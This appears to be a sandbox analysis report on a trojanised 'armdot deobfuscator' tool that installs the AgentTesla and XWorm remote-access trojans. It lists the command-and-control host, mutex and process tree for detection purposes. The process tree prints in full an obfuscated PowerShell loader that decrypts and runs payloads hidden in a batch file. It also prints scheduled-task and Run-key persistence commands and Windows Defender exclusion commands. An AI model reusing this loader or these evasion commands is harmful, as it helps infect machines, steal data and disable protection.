agenttesla | 39508b75635805ff4fa5eaf8c7aa926529b66ae52f08460d41d8d960e75385e3

Resubmissions

11-09-2024 08:55

240911-kvr1yasgla 10

11-09-2024 08:53

240911-ktswva1hpj 10

Analysis

max time kernel
101s
max time network
94s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
11-09-2024 08:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tool/armdot deobfuscator.exe
Size

275KB
MD5

2bce10bc9bf1c5e013965c7a60deae05
SHA1

7efa1765b1842f4ce9e746c26c7d8394ad7820ce
SHA256

5e74f08923fec3a5daf99b9a6c0763b21a98226f90c537235408a4258389ca01
SHA512

fbfadeb3f983cc76478864de82952ce34cb7543743a3421151827c5a8226d24ddff2409f71230dfc4bbfad441cea9a148a11a31c16e3890cd5a0797fe4a9e7c0
SSDEEP

6144:IwDHUsnM9rwQCz8vRtKT2OyD0Ek+c9NWtO5MxRxLJcNfZ:IAjMnZtgbyD0wyWtOcJeZ

Score

10^/10

agenttesla xworm discovery execution keylogger persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

127.0.0.1:41594

internal-bachelor.gl.at.ply.gg:41594

Mutex

JgIYtyxyvTKZt7Bf

Attributes

Install_directory
%LocalAppData%
install_file
svchost.exe

aes.plain

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral10/memory/4428-87-0x00000000080C0000-0x00000000080D0000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

AgentTesla payload 1 IoCs

resource	yara_rule
behavioral10/memory/5036-111-0x0000000005700000-0x0000000005914000-memory.dmp	family_agenttesla

Blocklisted process makes network request 3 IoCs

flow	pid	Process
20	4428	powershell.exe
27	4428	powershell.exe
44	4428	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4452	powershell.exe
1468	powershell.exe
4428	powershell.exe
4088	powershell.exe
4240	powershell.exe
2100	powershell.exe
4208	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	armdot deobfuscator.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
5036	Armdot Deobf.exe
3096	cmd.exe
3972	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\svchost.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Armdot Deobf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	armdot deobfuscator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	Armdot Deobf.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Armdot Deobf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Armdot Deobf.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4464	schtasks.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
4452	powershell.exe
4452	powershell.exe
1468	powershell.exe
1468	powershell.exe
4428	powershell.exe
4428	powershell.exe
4088	powershell.exe
4088	powershell.exe
4088	powershell.exe
4240	powershell.exe
4240	powershell.exe
4240	powershell.exe
2100	powershell.exe
2100	powershell.exe
2100	powershell.exe
4208	powershell.exe
4208	powershell.exe
4208	powershell.exe
4428	powershell.exe
3972	svchost.exe
3972	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeIncreaseQuotaPrivilege	1468	powershell.exe
Token: SeSecurityPrivilege	1468	powershell.exe
Token: SeTakeOwnershipPrivilege	1468	powershell.exe
Token: SeLoadDriverPrivilege	1468	powershell.exe
Token: SeSystemProfilePrivilege	1468	powershell.exe
Token: SeSystemtimePrivilege	1468	powershell.exe
Token: SeProfSingleProcessPrivilege	1468	powershell.exe
Token: SeIncBasePriorityPrivilege	1468	powershell.exe
Token: SeCreatePagefilePrivilege	1468	powershell.exe
Token: SeBackupPrivilege	1468	powershell.exe
Token: SeRestorePrivilege	1468	powershell.exe
Token: SeShutdownPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeSystemEnvironmentPrivilege	1468	powershell.exe
Token: SeRemoteShutdownPrivilege	1468	powershell.exe
Token: SeUndockPrivilege	1468	powershell.exe
Token: SeManageVolumePrivilege	1468	powershell.exe
Token: 33	1468	powershell.exe
Token: 34	1468	powershell.exe
Token: 35	1468	powershell.exe
Token: 36	1468	powershell.exe
Token: SeIncreaseQuotaPrivilege	1468	powershell.exe
Token: SeSecurityPrivilege	1468	powershell.exe
Token: SeTakeOwnershipPrivilege	1468	powershell.exe
Token: SeLoadDriverPrivilege	1468	powershell.exe
Token: SeSystemProfilePrivilege	1468	powershell.exe
Token: SeSystemtimePrivilege	1468	powershell.exe
Token: SeProfSingleProcessPrivilege	1468	powershell.exe
Token: SeIncBasePriorityPrivilege	1468	powershell.exe
Token: SeCreatePagefilePrivilege	1468	powershell.exe
Token: SeBackupPrivilege	1468	powershell.exe
Token: SeRestorePrivilege	1468	powershell.exe
Token: SeShutdownPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeSystemEnvironmentPrivilege	1468	powershell.exe
Token: SeRemoteShutdownPrivilege	1468	powershell.exe
Token: SeUndockPrivilege	1468	powershell.exe
Token: SeManageVolumePrivilege	1468	powershell.exe
Token: 33	1468	powershell.exe
Token: 34	1468	powershell.exe
Token: 35	1468	powershell.exe
Token: 36	1468	powershell.exe
Token: SeIncreaseQuotaPrivilege	1468	powershell.exe
Token: SeSecurityPrivilege	1468	powershell.exe
Token: SeTakeOwnershipPrivilege	1468	powershell.exe
Token: SeLoadDriverPrivilege	1468	powershell.exe
Token: SeSystemProfilePrivilege	1468	powershell.exe
Token: SeSystemtimePrivilege	1468	powershell.exe
Token: SeProfSingleProcessPrivilege	1468	powershell.exe
Token: SeIncBasePriorityPrivilege	1468	powershell.exe
Token: SeCreatePagefilePrivilege	1468	powershell.exe
Token: SeBackupPrivilege	1468	powershell.exe
Token: SeRestorePrivilege	1468	powershell.exe
Token: SeShutdownPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeSystemEnvironmentPrivilege	1468	powershell.exe
Token: SeRemoteShutdownPrivilege	1468	powershell.exe
Token: SeUndockPrivilege	1468	powershell.exe
Token: SeManageVolumePrivilege	1468	powershell.exe
Token: 33	1468	powershell.exe
Token: 34	1468	powershell.exe
Token: 35	1468	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4428	powershell.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 1636 wrote to memory of 3412	1636	armdot deobfuscator.exe	85
PID 1636 wrote to memory of 3412	1636	armdot deobfuscator.exe	85
PID 1636 wrote to memory of 3412	1636	armdot deobfuscator.exe	85
PID 3412 wrote to memory of 4452	3412	cmd.exe	88
PID 3412 wrote to memory of 4452	3412	cmd.exe	88
PID 3412 wrote to memory of 4452	3412	cmd.exe	88
PID 4452 wrote to memory of 1468	4452	powershell.exe	91
PID 4452 wrote to memory of 1468	4452	powershell.exe	91
PID 4452 wrote to memory of 1468	4452	powershell.exe	91
PID 4452 wrote to memory of 3080	4452	powershell.exe	96
PID 4452 wrote to memory of 3080	4452	powershell.exe	96
PID 4452 wrote to memory of 3080	4452	powershell.exe	96
PID 3080 wrote to memory of 4972	3080	WScript.exe	98
PID 3080 wrote to memory of 4972	3080	WScript.exe	98
PID 3080 wrote to memory of 4972	3080	WScript.exe	98
PID 4972 wrote to memory of 4428	4972	cmd.exe	100
PID 4972 wrote to memory of 4428	4972	cmd.exe	100
PID 4972 wrote to memory of 4428	4972	cmd.exe	100
PID 4428 wrote to memory of 5036	4428	powershell.exe	102
PID 4428 wrote to memory of 5036	4428	powershell.exe	102
PID 4428 wrote to memory of 5036	4428	powershell.exe	102
PID 4428 wrote to memory of 3096	4428	powershell.exe	101
PID 4428 wrote to memory of 3096	4428	powershell.exe	101
PID 4428 wrote to memory of 4088	4428	powershell.exe	106
PID 4428 wrote to memory of 4088	4428	powershell.exe	106
PID 4428 wrote to memory of 4088	4428	powershell.exe	106
PID 4428 wrote to memory of 4240	4428	powershell.exe	108
PID 4428 wrote to memory of 4240	4428	powershell.exe	108
PID 4428 wrote to memory of 4240	4428	powershell.exe	108
PID 4428 wrote to memory of 2100	4428	powershell.exe	110
PID 4428 wrote to memory of 2100	4428	powershell.exe	110
PID 4428 wrote to memory of 2100	4428	powershell.exe	110
PID 4428 wrote to memory of 4208	4428	powershell.exe	112
PID 4428 wrote to memory of 4208	4428	powershell.exe	112
PID 4428 wrote to memory of 4208	4428	powershell.exe	112
PID 4428 wrote to memory of 4464	4428	powershell.exe	114
PID 4428 wrote to memory of 4464	4428	powershell.exe	114
PID 4428 wrote to memory of 4464	4428	powershell.exe	114

C:\Users\Admin\AppData\Local\Temp\tool\armdot deobfuscator.exe
"C:\Users\Admin\AppData\Local\Temp\tool\armdot deobfuscator.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\crypt2.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3412
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wIalkQRXMjI6os9KK3k7hlFrDQkHj2XVm7J3WOd1/SA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e6ZRtmDqjWQoNwY5EpOeNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FqaIW=New-Object System.IO.MemoryStream(,$param_var); $iUhow=New-Object System.IO.MemoryStream; $lErRr=New-Object System.IO.Compression.GZipStream($FqaIW, [IO.Compression.CompressionMode]::Decompress); $lErRr.CopyTo($iUhow); $lErRr.Dispose(); $FqaIW.Dispose(); $iUhow.Dispose(); $iUhow.ToArray();}function execute_function($param_var,$param2_var){ $imtyS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PkVgO=$imtyS.EntryPoint; $PkVgO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\crypt2.bat';$CZdgQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\crypt2.bat').Split([Environment]::NewLine);foreach ($eeotO in $CZdgQ) { if ($eeotO.StartsWith(':: ')) { $Hwsqs=$eeotO.Substring(3); break; }}$payloads_var=[string[]]$Hwsqs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4452
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_730_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_730.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1468
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_730.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3080
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_730.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4972
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wIalkQRXMjI6os9KK3k7hlFrDQkHj2XVm7J3WOd1/SA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e6ZRtmDqjWQoNwY5EpOeNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FqaIW=New-Object System.IO.MemoryStream(,$param_var); $iUhow=New-Object System.IO.MemoryStream; $lErRr=New-Object System.IO.Compression.GZipStream($FqaIW, [IO.Compression.CompressionMode]::Decompress); $lErRr.CopyTo($iUhow); $lErRr.Dispose(); $FqaIW.Dispose(); $iUhow.Dispose(); $iUhow.ToArray();}function execute_function($param_var,$param2_var){ $imtyS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PkVgO=$imtyS.EntryPoint; $PkVgO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_730.bat';$CZdgQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_730.bat').Split([Environment]::NewLine);foreach ($eeotO in $CZdgQ) { if ($eeotO.StartsWith(':: ')) { $Hwsqs=$eeotO.Substring(3); break; }}$payloads_var=[string[]]$Hwsqs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\tool\cmd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tool\cmd.exe"
        7⤵
        Executes dropped EXE
        
        PID:3096
        
        C:\Users\Admin\AppData\Local\Temp\tool\Armdot Deobf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tool\Armdot Deobf.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:5036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\svchost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4208
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Local\svchost.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4464

C:\Users\Admin\AppData\Local\svchost.exe
C:\Users\Admin\AppData\Local\svchost.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
55d32bc1c206428fe659912b361362de

SHA1
7056271e5cf73b03bafc4e616a0bc5a4cffc810f

SHA256
37bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff

SHA512
2602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c08e6695e9fad937509975942656c87f

SHA1
dc243d5bd6699bfe94040271cb211799db40610a

SHA256
aae4fe263015c93f50a760c05e73700af8202dff49e91ae3fe1af5aa173b882a

SHA512
09ff1910d9bab64147b1e6bfb44eaba2baa2284082a43fffdbdcd43e7fa049de643fd027622417d7bba55118151f2ce0150d08d5557350302f2d6ae22f95d6f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2ec67a0149a70c7ccbf82a5af820650d

SHA1
195a2226dcaec497f2e5ff6dea6a12ce55f3403d

SHA256
64e3373e24d4bb0a054f00e2c1e94a143e6cf1958be89a15ef8a74233c9c4b1f

SHA512
2285a99b012fc46e869832e2d51b7c7002851d6d5f5b88ffdb1103deb08a556954e83646ccde7559a577d230bbb5dbbed67530ff5f197c577ad63a095c72eddb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
32b20699aff80402de95ecf08b5db4ce

SHA1
4bfacdd3aba808a6ca3350b60f55004cdef1b398

SHA256
83d7d6dfd3464e97ec7db8a28a19bee423e8a128ab786f43135ab490d76cae99

SHA512
c45ef29023e6c3d9105917597da32e9531f531e914bafd95c527c37afc2fe87e9fc45359901b48e6933c06faf8186bd7e7c6bd525bf7b0c83197a573f6fcd175

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
611144e42ef934bbebb1c8fb5c9b09e3

SHA1
7253d11b6551754706465c327b84510c52153603

SHA256
41e20ec31bb2855584fd57b3c2dcd0afdcfd214dc0b63a5e0fbd2b20b65d2b08

SHA512
cd6f405aa433e2fb98515bc3e945920896869dad430bfb1c3012afdd567693bd475d867d89eea4030b0e8af11f244624711c22a63f934c8d1a58a7ae8866a191

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phmxcv21.fyr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\crypt2.bat

Filesize
270KB

MD5
3ea84c5d84c23aa2336ad19120ca2f69

SHA1
89f8c3ce7dff799df989d77b0589faeacf29577a

SHA256
c96331a38563d38ce6ae9f99294c0b39a595275cfdaf1ea85f91f693a7c302e6

SHA512
6aa2bf0d81b3fc103333e242492724dbfb45acb7ca5fd3289360bb7cff09d0bd524537570bc353f7ca92fb2e064aacdd3ee7e0a2fa4259b12056301050b8000f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tool\Armdot Deobf.exe

Filesize
22KB

MD5
e949a85cefc515f6d281a64a322e575a

SHA1
05cbb24ee6b77d47ed6b839d446d60c8bc9ffe83

SHA256
66ae316114440dc776171193df2af2ce768a3da53b84759ad72209d3ecd73274

SHA512
a4a047bbbe8383601db9bfe0b6390559032ba475ce8bb6790720c18b1577c4bd7831f68d69fac6f14721d651d84316d740ef0dc58a2ba34f31870ba9957193f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\tool\cmd.exe

Filesize
316KB

MD5
428cec6b0034e0f183eb5bae887be480

SHA1
7140caf2a73676d1f7cd5e8529db861f4704c939

SHA256
3f6aa206177bebb29fc534c587a246e0f395941640f3f266c80743af95a02150

SHA512
509b8c138c4928524b4830488a96bd7e4bc7db2c494b10c68e1edcf7d901879126168eaa6635818d29734540f8400e376e5716a3b4dc052cba4e267bbaad7253

Download Submit
C:\Users\Admin\AppData\Local\svchost.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_730.vbs

Filesize
115B

MD5
81cbf15ecd9118329342299f6fc86778

SHA1
bd4ea5ac7736bd8cbf7050fd9b79349886b11227

SHA256
dea6eb2d69421377af63ffd59d4c507b5a42a6846395b883d149a95b662a3b73

SHA512
3f45c3e37447e5fded5eeea5d26c5459025f3446feecaa9bc8c1498efb9a956c87c8fc6fdf9856f7b49504a4e308bb9abe023314b53a06f95b9d2e14ad8afba1

Download Submit
memory/1468-53-0x0000000007750000-0x000000000776E000-memory.dmp

Filesize
120KB

Download
memory/1468-57-0x0000000007A80000-0x0000000007A91000-memory.dmp

Filesize
68KB

Download
memory/1468-56-0x0000000007B00000-0x0000000007B96000-memory.dmp

Filesize
600KB

Download
memory/1468-60-0x0000000074EA0000-0x0000000075650000-memory.dmp

Filesize
7.7MB

Download
memory/1468-55-0x00000000078F0000-0x00000000078FA000-memory.dmp

Filesize
40KB

Download
memory/1468-54-0x0000000007770000-0x0000000007813000-memory.dmp

Filesize
652KB

Download
memory/1468-30-0x0000000074EA0000-0x0000000075650000-memory.dmp

Filesize
7.7MB

Download
memory/1468-31-0x0000000074EA0000-0x0000000075650000-memory.dmp

Filesize
7.7MB

Download
memory/1468-41-0x0000000074EA0000-0x0000000075650000-memory.dmp

Filesize
7.7MB

Download
memory/1468-42-0x0000000007710000-0x0000000007742000-memory.dmp

Filesize
200KB

Download
memory/1468-43-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

Filesize
304KB

Download
memory/2100-169-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

Filesize
304KB

Download
memory/4088-136-0x0000000007A80000-0x0000000007A88000-memory.dmp

Filesize
32KB

Download
memory/4088-121-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

Filesize
304KB

Download
memory/4088-131-0x00000000076D0000-0x0000000007773000-memory.dmp

Filesize
652KB

Download
memory/4088-132-0x0000000007A10000-0x0000000007A21000-memory.dmp

Filesize
68KB

Download
memory/4088-133-0x0000000007A40000-0x0000000007A4E000-memory.dmp

Filesize
56KB

Download
memory/4088-134-0x0000000007A50000-0x0000000007A64000-memory.dmp

Filesize
80KB

Download
memory/4088-135-0x0000000007A90000-0x0000000007AAA000-memory.dmp

Filesize
104KB

Download
memory/4208-190-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

Filesize
304KB

Download
memory/4240-148-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

Filesize
304KB

Download
memory/4428-88-0x0000000008DC0000-0x0000000008E5C000-memory.dmp

Filesize
624KB

Download
